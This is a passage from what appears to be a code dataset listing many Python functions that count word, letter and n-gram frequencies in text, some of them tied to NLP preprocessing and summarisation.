m in whole:\n if m in freq:\n freq[m] += 1\n else:\n freq[m] = 1\n return freq\n # END", "def find_frequency(text, n=1):\n freqs = {}\n length = len(text)\n for i in xrange(0, length):\n upper = i+n\n if upper > length:\n break\n gram = text[i:upper]\n dict_operate(freqs, gram, 1, operator.add)\n return freqs", "def count(self):\n freq = {}\n\n for desc in self.words:\n if desc in freq:\n freq[desc] += 1\n else:\n freq[desc] = 1\n\n return freq", "def make_word_to_freq(self):\n\t\tword_to_freq = {}\n\t\tdocuments = self.tokenized_documents[\"train\"]\n\t\tfor document in documents:\n\t\t\tfor word in document:\n\t\t\t\tif not word in self.worddict: # make sure we have not found one of the pre-defined words\n\t\t\t\t\tword_to_freq[word] = word_to_freq.get(word, 0) + 1\n\t\t\n\t\treturn word_to_freq", "def _count_word_frequency(self, data):\n _dict = {}\n for _docs in data:\n for _word in _docs:\n if _word in _dict:\n _dict[_word] += 1\n else:\n _dict[_word] = 1\n return _dict", "def get_sentence_score(sentences, word_frequencies):\r\n sentence_scores = dict()\r\n for sent in sentences:\r\n word_count_without_stopwords=0\r\n for word in word_tokenize(sent.lower()):\r\n if word in word_frequencies.keys():\r\n word_count_without_stopwords+=1 \r\n if len(sent.split(' ')) < 30:\r\n if sent not in sentence_scores.keys():\r\n sentence_scores[sent] = word_frequencies[word]\r\n else:\r\n sentence_scores[sent] += word_frequencies[word]\r\n \r\n if sent in sentence_scores:\r\n sentence_scores[sent] = sentence_scores[sent]/word_count_without_stopwords\r\n \r\n print(sentence_scores) \r\n return sentence_scores", "def words(text):\n clean = TextBlob(clean(text))\n sentence_count = len(clean.sentences)\n words = clean.tokenize()\n word_count = len(words)\n avg_len = np.mean([len(word) for word in words])\n words_dict = {'sentence_count': sentence_count, 'word_count': word_count,\n 'avg_len': avg_len}\n return words_dict", "def word_frequency(a_string):\n\n for char in \"\"\".$#,:\"'?!)(\"\"\":\n a_string = a_string.replace(char, \"\")\n for char in \"\"\"-\"\"\":\n a_string = a_string.replace(char, \" \")\n\n cleanstring = a_string.lower()\n a_list = cleanstring.split()\n a_dict = {}\n for item in a_list:\n if item in a_dict:\n a_dict[item]+= 1\n else:\n a_dict[item] = 1\n return a_dict", "def parse_text(self, text, wordcount_dictionary=None):\n if not wordcount_dictionary:\n wordcount_dictionary = {}\n words = self.parse_regexp.findall(text)\n for word in words:\n new_word = stem(word.lower())\n if new_word not in self.stopwords:\n if new_word in wordcount_dictionary:\n wordcount_dictionary[new_word] += 1\n else:\n wordcount_dictionary[new_word] = 1\n return wordcount_dictionary", "def word_count(self, document):\n start_time = time.time()\n dictionary = dict()\n counter = defaultdict(int)\n for line in document.splitlines():\n for word in line.split():\n if word not in PUNCTUATION_MARK:\n counter[word] += 1\n for word, cnt in sorted(counter.items(), key=lambda x: (-x[1], x[0])):\n dictionary[word] = cnt\n self.log.info(\"Duration count dictionary: {duration}\".format(duration=float(time.time() - start_time)))\n return dictionary", "def task1(sentence):\n split_sentence = sentence.split()\n dictionary = dict()\n for word in split_sentence:\n if word in dictionary:\n dictionary[word] += 1\n else:\n dictionary[word] = 1\n for item in dictionary:\n print(\"Word \" + item + \" used \" + str(dictionary[item]) + \" times\")\n return dictionary", "def _count_words_in_string(self, sentence):\n word_count = dict()\n for i in sentence:\n if word_count.get(i) is None:\n word_count[i] = 1\n else:\n word_count[i] = word_count.get(i)+1\n\n return word_count", "def create_freq_dict(sents, lang):\n ix = 0\n freq_dict_all = []\n stop_words = set(stopwords.words(lang))\n\n for sent in sents:\n ix += 1\n freq_dict = {}\n words = word_tokenize(sent)\n\n for word in words:\n word = word.lower()\n if word not in stop_words:\n if word in freq_dict:\n freq_dict[word] += 1\n else:\n freq_dict[word] = 1\n\n temp = {\n 'doc_id': ix,\n 'freq_dict': freq_dict\n }\n\n freq_dict_all.append(temp)\n\n return freq_dict_all", "def letter_freq( text ):\n\tchars = string.ascii_uppercase\n\ttext = text.upper()\n\tresult = get_letter_dict()\n\ttotal = 0\n\tfor char in chars:\n\t\tcount = text.count(char)\n\t\tresult[char] = count\n\t\ttotal += count\n\tif total != 0:\n\t\tfor char in chars:\n\t\t\tresult[char] = (result[char]*10000 / total) / float(100)\n\treturn result", "def calculate_frequencies(cipher_text: str) -> dict:\n cipher_frequencies = dict()\n for character in cipher_text:\n try:\n cipher_frequencies[character] += 1\n except KeyError:\n cipher_frequencies[character] = 1\n \n return cipher_frequencies", "def get_word_freq_dict(df_col):\n results = Counter()\n df_col.str.lower().str.split().apply(results.update)\n results = sorted(results.items(), key=lambda item: item[1], reverse=True)\n d = {}\n for word, freq in results:\n d[word] = freq\n return d", "def frequency(self, path, filemoving, parser):\n root = parser.parsing_xml(path, filemoving)\n root_tag = root.tag[0:(root.tag.find('}') + 1)]\n list_of_words = []\n for i in root.iter(root_tag + 'p'):\n if str(type(i.text)) == \"<class 'str'>\":\n for word in i.text.split():\n alphanumeric_filter = filter(str.isalnum, word)\n alphanumeric_string = \"\".join(alphanumeric_filter)\n list_of_words.append(alphanumeric_string)\n dict_of_frequency = collections.Counter(list_of_words)\n return dict_of_frequency", "def make_freq_dict(word_list):\n\n\tfreq_dict = {}\n\n\tfor word in word_list: #need to slice each tale into a list of words for this to work\n\t\tif word in freq_dict:\n\t\t\tcurrent_val = freq_dict.get(word)\n\t\t\tval = current_val + 1\n\t\t\tfreq_dict[word] = val #made a dictionary of the string (word, frequnecy)\n\t\telse: #if it isn't in the dictionary\n\t\t\tfreq_dict[word] = 1\n\treturn freq_dict", "def letter_freq(txt):\n frequencies = {}\n txt_lower = txt.lower()\n\n for i in txt_lower:\n keys = frequencies.keys()\n if i in keys:\n frequencies[i] += 1\n else:\n frequencies[i] = 1\n return frequencies", "def frequencies(self):\n dic = {}\n for word in self.words():\n dic[word] = dic.get(word, 0) + 1\n return dic", "def calculate_ngram_frequencies(text, n):\n\n import re\n\n # Create a new dictionary\n ngram_dict = {}\n\n # Find all sentences\n sentences_list = re.findall(r'[^\\.\\?!\"]+', text)\n\n # Iterate over sentences in the list\n for sentence in sentences_list:\n # Split words by a whitespace character\n words_list = sentence.rsplit()\n\n # Iterate over ngrams in the sentence\n for i in range(len(words_list) - n + 1):\n\n # Join the words to size of n\n ngram = ' '.join(words_list[i:i + n])\n\n # Record the presence of a new ngram\n if not ngram in ngram_dict:\n ngram_dict[ngram] = 1\n\n # Add the number of occurrence of the ngram\n elif ngram in ngram_dict:\n ngram_dict[ngram] += 1\n\n return ngram_dict", "def count_word_in_each_sentence(sentence):\n\tsentence = sentence.lower()\n\twords = sentence.split()\n\tcount_dict = dict()\n\tfor _ in words:\n\t\tif count_dict.get(_):\n\t\t\tcount_dict[_] += 1\n\t\telse:\n\t\t\tcount_dict[_] = 1\n\treturn count_dict", "def word_frequency_dict(tokens):\n\n\tfdist = FreqDist(tokens) \t\t\t\t\t\t# fdist.keys() fdist.values()\n\treturn dict(fdist)", "def word_frequencies(word_list: TextIO) -> dict:\n words = word_list.read().split(' ')\n amount_of_words = len(set(words))\n frequencies = {}\n for index, word in enumerate(words):\n clean_word = remove_punctuation(word)\n if clean_word not in frequencies:\n frequencies[clean_word] = (index + 1) / amount_of_words\n del frequencies[\"\"]\n return frequencies", "def word_freq(word, ngram_dict):\n word = word.lower()\n return ngram_dict[word] if word in ngram_dict else 0", "def word_frequency(seq):\n\n # Initializes an emtpy hash map from HashMap class\n hash_map = HashMap()\n\n # For each word (not unique) in sequence\n for word in seq:\n\n # if that word is already in hash map\n if word in hash_map:\n\n # Increment value for that word\n hash_map[word] += 1\n\n # if word not yet in hash map\n else:\n\n # set count value for word equal to one\n hash_map[word] = 1\n\n # return filled hash map from sequence, words and words counts\n return hash_map", "def get_wordcount(text):\r\n\r\n characters = len(text)\r\n chars_no_spaces = sum([not x.isspace() for x in text])\r\n asian_chars = sum([is_asian(x) for x in text])\r\n non_asian_words = nonj_len(text)\r\n words = non_asian_words + asian_chars\r\n \r\n return dict(characters=characters,\r\n chars_no_spaces=chars_no_spaces,\r\n asian_chars=asian_chars,\r\n non_asian_words=non_asian_words,\r\n words=words)", "def convert_word_to_count(counter={}, doc=[]):\n for sentence in doc:\n for word in sentence.split():\n if word not in counter:\n counter[word] = 1\n else:\n counter[word] += 1\n return counter", "def frequencies(corpus, index, to_lower=False):\n freq = {}\n for sentence in corpus.get_sentences():\n for word in sentence:\n key = word[index]\n if to_lower:\n key = key.lower()\n if key in freq:\n freq[key] += 1\n else:\n freq[key] = 1\n\n return freq", "def mapWordsFrequencies(self):\n token_stream = self._tokenize(self.readable)\n token_map = self._countTokens(token_stream)\n return token_map", "def lyrics_to_frequencies(lyrics):\n lyricsDictionary = dict()\n for each_word in lyrics:\n if each_word in lyricsDictionary:\n lyricsDictionary[each_word] += 1\n else:\n lyricsDictionary[each_word] = 1\n return lyricsDictionary", "def dictify(words):\n word_freq = {}\n for word in words:\n if word:\n key = word.lower()\n if key in word_freq:\n word_freq[key] += 1\n else:\n word_freq[key] = 1\n else:\n pass\n return word_freq", "def info(doc):\n\tinfo = {}\n\tinfo['sentences'] = [str(sent) for sent in doc.sents]\n\t#sentences : [sent1, sent2, ...]\n\tinfo['tokens'] = [str(token) for token in doc]\n\t#all tokens in info['tokens']\n\ttoken_vals = {}\n\tfor token in info['tokens']:\n\t\tcurrent_word = token\n\t\ti = 0\n\t\tcurrent_sent = info['sentences'][i]\n\t\tfor i in range(len(info['sentences'])): #for each sentence\n\t\t\tval = current_sent.count(str(current_word))\n\t\t\t#value is the number of times the current word is in the current sent\n\t\t\ttoken_vals[str(token)] = val\n\t\t\t#append to dictionary\n\tinfo['token_vals'] = token_vals\n\t#given a word and a sentence, val is how many times it appears in that sentence\n\treturn info", "def process_document(text):\n words = preprocess(text)\n postings = {}\n for word, ix in words:\n if word in postings:\n wordinfo = postings[word]\n else:\n wordinfo = {\"frequency\": 0, \"indexes\": []}\n postings[word] = wordinfo\n wordinfo[\"frequency\"] += 1\n wordinfo[\"indexes\"].append(ix)\n return postings", "def word_count(phrase):\n word_dict = {}\n\n for word in phrase.split():\n word_dict[word] = word_dict.get(word, 0) + 1\n\n return word_dict", "def create_word_score(self):\n word_freq = {}\n word_deg = {}\n for zettel in self.lemma_tokens:\n for word in zettel:\n word_list = re.split(\" \", word[0])\n word_list_deg = len(word_list) - 1\n for new_word in word_list:\n word_freq.setdefault(new_word, 0)\n word_freq[new_word] = word_freq[new_word] + 1\n word_deg.setdefault(new_word, 0)\n word_deg[new_word] = word_deg[new_word] + word_list_deg\n word_score = {}\n for word in word_freq:\n word_deg[word] = word_deg[word] + word_freq[word]\n word_score.setdefault(word, 0)\n word_score[word] = word_deg[word] / (word_freq[word] * 1.0)\n return word_score", "def word_count(input_str):\n counts = dict()\n words = input_str.split()\n for word in words:\n if word in counts:\n counts[word] += 1\n else:\n counts[word] = 1\n\n return counts", "def generate_frequency_map(data: str) -> Dict[str, int]:\n seperators: Final[List[str]] = [\n ',', '.', '\\n', ' ', '\\t', '?', '<', '>', '!', ':', ';'\n ]\n tokens: List[str] = tokenize(data, seperators)\n\n frequency_map: Dict[str, int] = {}\n for token in tokens:\n if token in frequency_map.keys():\n frequency_map[token] += 1\n else:\n frequency_map[token] = 1\n return frequency_map", "def calc_weighted_frequency(words,ps,lem,stopWords,text_string):\r\n \r\n\r\n word_frequencies = dict()\r\n for word in words:\r\n word = ps.stem(word)\r\n word = lem.lemmatize(word)\r\n print(word)\r\n if word not in stopWords:\r\n if word not in word_frequencies:\r\n word_frequencies[word] = 1\r\n else:\r\n word_frequencies[word] += 1\r\n \r\n maximum_frequncy = max(word_frequencies.values())\r\n for word in word_frequencies.keys():\r\n word_frequencies[word] = (word_frequencies[word]/maximum_frequncy) \r\n print(word_frequencies)\r\n return word_frequencies", "def counterFrequency(text):\n dictText = {}\n maxN = 0\n mostFrequent = \"\"\n for item in text:\n if (item not in dictText):\n dictText[item] = 1\n else: \n dictText[item] +=1\n \n if (dictText[item] > maxN):\n mostFrequent = item\n maxN = dictText[item]\n return mostFrequent", "def initialize_document_frequencies():\n global document_frequency\n for term in dictionary:\n document_frequency[term] = len(postings[term])", "def initialize(eng, fre):\n\t# TODO\n t = {}\n t[\"SENTSTART\"] = {\"SENTSTART\":1}\n t[\"SENTEND\"] = {\"SENTEND\":1}\n num_sentences = len(eng)\n for i in range(num_sentences):\n list_eng = eng[i].split(\" \")\n list_fre = fre[i].split(\" \")\n for word_eng in list_eng:\n if word_eng == 'SENTSTART' or word_eng == 'SENTEND':\n continue\n if word_eng not in t:\n t[word_eng] = {}\n for word_fre in list_fre:\n if word_fre in t[word_eng]:\n t[word_eng][word_fre] += 1\n else:\n t[word_eng][word_fre] = 1\n for word_eng in t:\n num = 0\n for word_fre in t[word_eng]:\n num += t[word_eng][word_fre]\n for word_fre in t[word_eng]:\n t[word_eng][word_fre] /= num\n return t", "def histogram(text):\n hist = {}\n\n for char in text.lower():\n if char.isalpha():\n hist[char] = hist.get(char, 0) + 1\n else:\n hist['others'] = hist.get('others', 0) + 1\n return hist", "def _compute_frequencies( word_sent):\n\t\tfreq = defaultdict(int)\n\t\tfor s in word_sent:\n\t\t\tfor word in s:\n\t\t\t\tif word not in _stopwords:\n\t\t\t\t\tfreq[word] += 1\n\t\t\t\t# frequencies normalization and fitering\n\t\treturn freq", "def frequency(text):\n # TODO: change function input to a textfile?\n import collections\n freq = collections.Counter(text)\n # print freq\n return freq", "def freq(word, document):\n return document.split(None).count(word)", "def word_freq(self, word_list):\n hist = {}\n for word in word_list:\n hist[word] = hist.get(word, 0) + 1\n return hist", "def get_freqs(self):\n dictionary = {}\n for word in self.word_list:\n if word in dictionary:\n dictionary[word] += 1\n else:\n dictionary[word] = 1\n letter_sorted = sorted(dictionary.items(), key=lambda entry: entry[0]) #sorts dictionary into alphabetized tuples\n count_sorted = sorted(letter_sorted, key=lambda seq: seq[1], reverse=True) #sorts alphabetical tuples into count order\n return count_sorted", "def fit(self, text):\n\n if self.lowercase:\n text = text.lower()\n\n print(\"Tokenize sentences...\")\n tokens = word_tokenize(text)\n\n self.words_set_size = len(set(tokens))\n\n print(\"Collecting of ngram counters...\")\n\n self.unigram_counts = Counter(tokens)\n self.bigram_counts = Counter(bigrams(tokens))\n\n return self", "def computeWordFrequencies(self, tokens: ['token'], frequencies: {'token': int}):\n # project2: update this method to take existing dict as parameter and modify it\n # additionally, stopwords are not inserted in the dict;\n # words shorter than 3 character or contains all digits are ignored\n for token in tokens:\n # if the key is not in dict, dict.setdefault method initiates the value at 0\n # if token not in stopwords and len(token) >= 3 and not token.isdigit():\n frequencies[token] = frequencies.setdefault(token, 0) + 1", "def word_frequency( tokenized, dic ):\n print( 'computing word frequencies' )\n start = time.time()\n for i, text in enumerate( tokenized ):\n for token in text:\n if token not in dic:\n dic[ token ] = 1\n else:\n dic[ token ] += 1\n if i % 10000 == 0:\n sys.stdout.write( '\\rprocessed : {}/{} reviews in {}s'.format( i, NO_REVIEWS, time.time() - start ) )\n sys.stdout.write( '\\rprocessed : {}/{} reviews in {}s\\n'.format( i, NO_REVIEWS, time.time() - start ) )", "def frequency(w: str) -> float:\n return frequency_list.get(remove_punctuation(w), 0)", "def analyze_word(s):\n\n a = {}\n a['word'] = s\n a['n_letters'] = len(s)\n a['n_vowels'] = count_vowels(s)\n \n return a", "def loop_through_text(phrase_length):\n\n # get text\n tanach = get_all_text()\n tanach = tanach.split()\n\n results = {}\n\n for index in range(len(tanach)):\n query = ' '.join(tanach[index:index+phrase_length])\n\n if query in results:\n results[query] += 1\n\n else:\n results[query] = 1\n\n return results", "def count_words(self, contents):\n wordCounts = {}\n for i in self.ngramCounts:\n if i == 0: # want the default to be the size of the corpus\n total = 0\n for line in contents:\n words = line.split(\" \")\n words = [ w.strip() for w in words if w] #remove nulls\n for word in words:\n if word:\n total += 1\n wordCounts[i] = defaultdict(lambda: total)\n continue\n else:\n counts = defaultdict(lambda: 0)\n for line in contents:\n words = line.split(\" \")\n words = [ w.strip() for w in words if w] #remove nulls\n for k, word in enumerate(words): \n if k < (i-1) or not word:\n continue\n key = \"\"\n for j in range(k-i+1, k+1):\n key += words[j] + \" \"\n counts[key.strip()] += 1\n wordCounts[i] = counts\n return wordCounts", "def prep_dict(word):\n counts = {}\n for l in word.lower():\n if l!=\" \":\n counts[l] = counts.get(l,0) + 1\n return counts", "def get_ngramlogprobs(freqdict):\n return", "def __init__(self, input_string):\n self.words_to_counts = {}\n self.split_and_populate_words(input_string)", "def count_words(phrase):\n # split the input string at spaces\n phrase_split = phrase.split()\n\n # initiate empty dictionary\n word_count = {}\n\n # iterate over words in the phrase\n for word in phrase_split:\n if word in word_count:\n\n # if the word is already a key in the dictionary, increase the value by 1\n word_count[word] += 1\n\n else:\n # if the word is not a key in the dictionary, set its value to 1\n word_count[word] = 1\n\n return word_count", "def term_frequency(ngrams,lang):\n token_dictionary = {}\n for ng in ngrams:\n try:\n token_dictionary[ng] = token_dictionary[ng] + 1\n except KeyError:\n token_dictionary[ng] = 1\n return token_dictionary", "def word_count(input_file, word_freq=None):\n if word_freq is None:\n word_freq = collections.defaultdict(int)\n\n for l in input_file:\n for w in l.strip().split():\n word_freq[w] += 1\n\n return word_freq", "def getFrequencyDict(sequence):\n # freqs: dictionary (element_type -> int)\n \n for x in sequence:\n hand[x] = hand.get(x,0) + 1\n updatehand(hand, word)\n print hand\n print \"freq function\"\n #return hand", "def words(phrase):\n\twordlist = phrase.split()\n\tunique_wordlist = []\n\tword_freq = []\n\n \n\twhile wordlist:\n\t\tword_freq.append(wordlist.count(wordlist[0])) #count the instances of a word and add it to the frequencies list\n\t\tunique_wordlist.append(wordlist[0]) #add the word into a unique words list\n\t\twordlist = list(filter((wordlist[0]).__ne__, wordlist)) #remove all other similar words from the wordlist\n\n\n\tn = len(word_freq)\n\toutput = {}\n\n\tfor i in range(n):\n\t\tif unique_wordlist[i].isdigit(): #convert sting digits into int\n\t\t\tunique_wordlist[i] = int(unique_wordlist[i])\n\t\toutput[unique_wordlist[i]] = word_freq[i] #add the unique words with their corresponding frequencies into the output dict\n\t\n\treturn output", "def make_worddict(self):\n\t\tprint(\"Making word dictionary\")\n\t\tword_to_freq = self.make_word_to_freq()\n\t\twords = list(word_to_freq.keys())\n\t\twords.sort() # sort alphabetically first to avoid non-deterministic ordering of words with the same frequency\n\t\twords.sort(key = lambda x:word_to_freq[x], reverse = True)\n\n\t\tfor word in words[:self.FREQCAP-len(self.worddict)]:\n\t\t\tself.worddict[word] = len(self.worddict)\n\t\t\n\t\tprint(\"Word dictionary size:\", len(self.worddict))", "def count_ngrams(self, corpus):\n \n self.unigramcounts = defaultdict(int)\n self.bigramcounts = defaultdict(int)\n self.trigramcounts = defaultdict(int)\n\n self.sentence_counts = 0\n self.word_count = 0\n\n for line in corpus:\n sequence = line\n self.sentence_counts +=1\n\n unigrams = get_ngrams(sequence, n=1)\n for gram in unigrams:\n self.word_count += 1\n self.unigramcounts[gram] +=1\n\n bigrams = get_ngrams(sequence, n=2)\n for gram in bigrams:\n self.bigramcounts[gram] +=1\n\n trigrams = get_ngrams(sequence, n=3)\n for gram in trigrams:\n self.trigramcounts[gram] +=1\n\n #self.unigramcounts[('START')] = self.sentence_counts *2\n self.bigramcounts[('START', 'START')] = self.sentence_counts\n\n #return self", "def word_count(phrase):\n words = phrase.split()\n deDupedWords = set(words)\n wordCount = {}\n\n for element in deDupedWords:\n wordCount.update({element: words.count(element)})\n\n return wordCount", "def stats_text_en(text):\n text1 = text.replace(',','').replace('.','').replace('--','').replace('*','').replace('!','') # Remove the non-English characters in the text.\n text2 = text1.split() # Convert the string type to the list type.\n dict = {x: text2.count(x) for x in text2} # Count the times of each word in the list.\n dict1= sorted(dict.items(), key= lambda d:d[1], reverse = True) # Sort the words in the descending order according to the times of words.\n print(dict1) # Return the result.", "def build_tf_dict(self, sentences):\n tf_dict = defaultdict(int)\n for sentence in sentences:\n for word in sentence:\n tf_dict[word] += 1\n return tf_dict", "def loop_through_text(phrase_length):\n\n # get text\n tanach = get_all_text()\n tanach = tanach.split()\n\n results = {}\n\n for index in xrange(len(tanach)):\n query = ' '.join(tanach[index:index+phrase_length])\n\n if query in results:\n results[query] += 1\n\n else:\n results[query] = 1\n\n return results", "def frequencyAnalysis(article, dictionary):\r\n string = article #Sets the string to the article\r\n string = re.sub(\"[^a-zA-Z0-9’\\s]+\",'', string) #Takes the articles and removes all characters appart from apostrophes, spaces, digits, and leters\r\n string = re.sub(\"’\", \"'\", string) #Replaces ’ with '\r\n string = string.lower() #Ensures that all the charcters are lower case\r\n stringList = string.split() #Takes the article and turns it into a list\r\n \r\n print(\"\\nConverted article to list\\n\")\r\n \r\n print(\"Starting frequency analysis\\n\")\r\n\r\n #Started the frequency anaylsis\r\n for word in stringList:\r\n if \"'s\" in word: #Done to remove extra keys in the dictionary, removes the possessive such that it counts \"Trump\" and \"Trump's\" as one word\r\n word = word[0:-2]\r\n elif \"s'\" in word:\r\n word = word[0:-1]\r\n if word != \"advertisement\":\r\n if word in dictionary:\r\n dictionary[word] +=1 #If it finds the word in the dictionary, the frequency has to increase by one\r\n else:\r\n dictionary[word] = 1 #If it finds a new word, it needs to add the word so the frequency is one\r", "def get_wordcount_obj(text):\r\n return dict2obj(get_wordcount(text))", "def get_letter_counts(str_):\n return dict(Counter(str_))", "def _word_counter(input_string: str) -> Dict[str, int]:\n # @todo Create a data type that can counts keys as they are added\n _current_word = ''\n parsed_words = {}\n\n for character in input_string.lower():\n if character in MaximalTextAnalyzer._letters:\n _current_word += character\n elif len(_current_word):\n parsed_words = MaximalTextAnalyzer._insert_into_dict(\n words_dict=parsed_words, key=_current_word)\n\n _current_word = ''\n\n # What if it does not end with a separator?\n if _current_word:\n parsed_words = MaximalTextAnalyzer._insert_into_dict(\n words_dict=parsed_words, key=_current_word)\n\n return parsed_words", "def create_dict(text):\n #On/Off case sensitivity\n text = text.lower() \n\n #handy one liner that splits words apart via whitespace, and \n #removes punctuation. Results in list of words.\n word_list = [s.strip(string.punctuation) for s in text.split()]\n \n d = dict()\n for word in word_list:\n d[word] = d.get(word, 0) +1\n return d", "def computeWordsFrequencies(self):\n token_stream = self._tokenize(self.readable)\n token_map = self._countTokens(token_stream)\n # print token_map.items()\n return sorted(token_map.items(), key = lambda x : x[1], reverse = True)", "def _create_freq_dist(self):\r\n freq_dict = dict()\r\n\r\n for element in self.data:\r\n if element in freq_dict:\r\n freq_dict[element] += 1\r\n else:\r\n freq_dict[element] = 1\r\n\r\n return freq_dict", "def word_frequency(words):\n freq = {}\n for w in words:\n cur_word = w.lower().strip(punctuation)\n freq[cur_word] = freq.get(cur_word, 0) + 1\n return freq", "def getTextStatsFeat(text, stemmRequired = True,\r\n excludeStopwordsRequired = True):\r\n #length = len(text)\r\n sentenceCount = len(re.findall(\"[.?!]\", text))\r\n exclamationMarkCount = len(re.findall(\"[!]\", text))\r\n questionMarkCount = len(re.findall(\"[?]\", text))\r\n digitsCount = len(re.findall(\"[0-9]+\", text))\r\n text = text.replace(\",\", \" \").replace(\".\", \" \")\r\n cleanText = re.sub('[^a-zа-я0-9]', ' ', text.lower())\r\n wordCount = 0.0\r\n charCount = 0.0\r\n rusCharCount = 0.0\r\n engCharCount = 0.0\r\n if excludeStopwordsRequired:\r\n for w in cleanText.split():\r\n if len(w)>1 and w not in stopwords:\r\n if not (not stemmRequired or re.search(\"[0-9a-z]\", w)):\r\n w = stemmer.stem(w)\r\n wordCount += 1\r\n c, rus, eng = getWordCharCount(w)\r\n charCount += c\r\n rusCharCount += rus\r\n engCharCount += eng\r\n else:\r\n for w in cleanText.split():\r\n if len(w)>1:\r\n if not (not stemmRequired or re.search(\"[0-9a-z]\", w)):\r\n w = stemmer.stem(w)\r\n wordCount += 1\r\n c, rus, eng = getWordCharCount(w)\r\n charCount += c\r\n rusCharCount += rus\r\n engCharCount += eng\r\n # per sentence\r\n wordPerSentence = tryDivide(wordCount, sentenceCount)\r\n charPerSentence = tryDivide(charCount, sentenceCount)\r\n rusCharPerSentence = tryDivide(rusCharCount, sentenceCount)\r\n engCharPerSentence = tryDivide(engCharCount, sentenceCount)\r\n # per word\r\n charPerWord = tryDivide(charCount, wordCount)\r\n rusCharPerWord = tryDivide(rusCharCount, wordCount)\r\n engCharPerWord = tryDivide(engCharCount, wordCount)\r\n # ratio\r\n rusCharRatio = tryDivide(rusCharCount, charCount)\r\n engCharRatio = tryDivide(engCharCount, charCount)\r\n rusCharVsEngChar = tryDivide(rusCharCount, engCharCount)\r\n engCharVsRusChar = tryDivide(engCharCount, rusCharCount)\r\n \r\n stats = [\r\n sentenceCount,\r\n wordCount,\r\n charCount,\r\n rusCharCount,\r\n engCharCount,\r\n digitsCount,\r\n exclamationMarkCount,\r\n questionMarkCount,\r\n wordPerSentence,\r\n charPerSentence,\r\n rusCharPerSentence,\r\n engCharPerSentence,\r\n charPerWord,\r\n rusCharPerWord,\r\n engCharPerWord,\r\n rusCharRatio,\r\n engCharRatio,\r\n rusCharVsEngChar,\r\n engCharVsRusChar,\r\n ]\r\n statsFeat = \"\"\r\n for i,f in enumerate(stats):\r\n if f != 0:\r\n statsFeat += \"%s:%s \" % (i+1, f)\r\n statsFeat = statsFeat[:-1] \r\n return statsFeat", "def dfc(text: str):\n #Splitting the text into a list\n wordlist = text.split()\n worddictionary = {}\n\n #Creating the wordlist dictionary\n for word in wordlist:\n if word in worddictionary:\n #Increase\n worddictionary[word] += 1\n else:\n #add to the dictionary\n worddictionary[word] = 1\n\n #Converting worddictionary into a dataframe\n df = pd.DataFrame.from_dict(worddictionary, orient='index')\n #Resetting index to a numerical one for ease of use\n df = df.reset_index()\n #Renaming the old string-valued index\n df = df.rename(columns={'index':'word'})\n #Defining two functions (over empty variables) to replace commas and dots\n remover = lambda x: x.replace(',','')\n remover2 = lambda x: x.replace('.','')\n #Using ( too many lines) to apply the functions\n df['word'] = df['word'].apply(remover)\n df['word'] = df['word'].apply(remover2)\n #Row-wise Subselection and assignment to remove words with a frequency smaller than 2\n df = df[df[0] > 2]\n #Renaming word frequncy\n df = df.rename(columns={0:'Frequency'})\n\n return df", "def get_frequencies(filename):\n freq_dict = {}\n _,long_name = filename.split(\"\\\\\")\n name,_ = long_name.split(\"_gold_\")\n f = os.path.join(PARSED, name + \".fix.xml\")\n #soup = bs(open(f, 'r'))\n soup = bs(codecs.open(f, 'r', encoding='utf-8'))\n for sent in soup.findAll('sentence'):\n for token in sent.findAll('token'):\n try:\n w = token.word.string\n if w in freq_dict:\n freq_dict[w] += 1\n else:\n freq_dict[w] = 1\n except AttributeError:\n pass\n return freq_dict", "def textSentencesLength(txt):\n\tsentencesLength = []\n\tfor sentence in txt:\n\t\tsentencesLength.append(len(sentence))\n\tprint \"The longest sentence is \", txt[sentencesLength.index(max(sentencesLength))]\n\tprint \"The shortest sentence is\", txt[sentencesLength.index(min(sentencesLength))]\n\tfrequencyDistribution = FreqDist(length for length in sentencesLength)\n\tfrequencyDistribution.plot()\n\tfrequencyDistribution.tabulate(samples=frequencyDistribution.keys())\n\treturn sentencesLength;", "def count_n_grams(data, n, start_token='<s>', end_token = '<e>'):\r\n \r\n # Initialize dictionary of n-grams and their counts\r\n n_grams = {}\r\n\r\n \r\n for sentence in data: # complete this line\r\n \r\n # prepend start token n times, and append <e> one time\r\n sentence = [start_token]*n + sentence + [end_token]\r\n \r\n # convert list to tuple\r\n # So that the sequence of words can be used as\r\n # a key in the dictionary\r\n sentence = tuple(sentence)\r\n\r\n \r\n for i in range(len(sentence)+1-n): # complete this line\r\n\r\n # Get the n-gram from i to i+n\r\n n_gram = sentence[i:i+n]\r\n\r\n # check if the n-gram is in the dictionary\r\n if n_gram in n_grams: \r\n \r\n # Increment the count for this n-gram\r\n n_grams[n_gram] += 1\r\n else:\r\n # Initialize this n-gram count to 1\r\n n_grams[n_gram] = 1\r\n \r\n return n_grams", "def __init__(self):\r\n #\r\n # Create dictionaries for each characteristic\r\n #\r\n self.words = {} # For counting words\r\n self.wordlengths = {} # For counting word lengths\r\n self.stems = {} # For counting stems\r\n self.sentencelengths = {} # For counting sentence lengths\r\n #\r\n # Create another of your own\r\n #\r\n self.gerund = {} # For counting words with ing \r\n self.text = ''", "def calculate_word_counts(text : Text)->Counter:\n return Counter(tokenized_text(text))", "def get_word_frequencies(topic_description):\n frequencies = {w:f for w,f in topic_description}\n return frequencies", "def getFrequencies(tweets):\n total_words = 0\n word_freq = {}\n for tweet in tweets:\n twext = tweet['clean_text']\n for word in twext.split(' '):\n word = word.strip()\n if word:\n total_words += 1\n if word not in word_freq:\n word_freq[word] = float(1)\n else:\n word_freq[word] += 1\n for key in word_freq:\n word_freq[key] = word_freq[key]/total_words\n return word_freq", "def get_frequencies(tokens):\n cnt = {}\n\n for word in tokens:\n if word not in cnt:\n cnt[word] = 0\n\n cnt[word] += 1\n\n return cnt", "def word_count(self):\n\n # split words on default word boundaries for words list\n words = self.phrase.split() \n\n # translate removes punctuation only, normalizes to lower case\n normalized_words = [self.normalize_word(w) for w in words]\n\n # removes empty strings after stripping punctuation\n filtered_words = [w for w in normalized_words if w]\n\n # sets up default dictionary, so all entries are 0\n word_counts = collections.defaultdict(int) #{}\n\n # define word counting function for use in reduce\n def count_word(dictionary, word):\n dictionary[word] = dictionary[word] + 1\n return dictionary\n\n # count words into dictionary from word list\n reduce(count_word, filtered_words, word_counts)\n\n return word_counts", "def getFreq(encrypted):\n freq = {}\n for i in encrypted:\n freq[i] = 0\n for i in encrypted:\n freq[i] += 1.0 \n return freq", "def get_word_count(my_str):\n my_list = my_str.split(\" \")\n my_map = {}\n for word in my_list:\n # Strip the word from any character\n word = word.strip(\".\")\n word = word.strip(\",\")\n # Convert word to all lowercase\n word = word.lower()\n if word 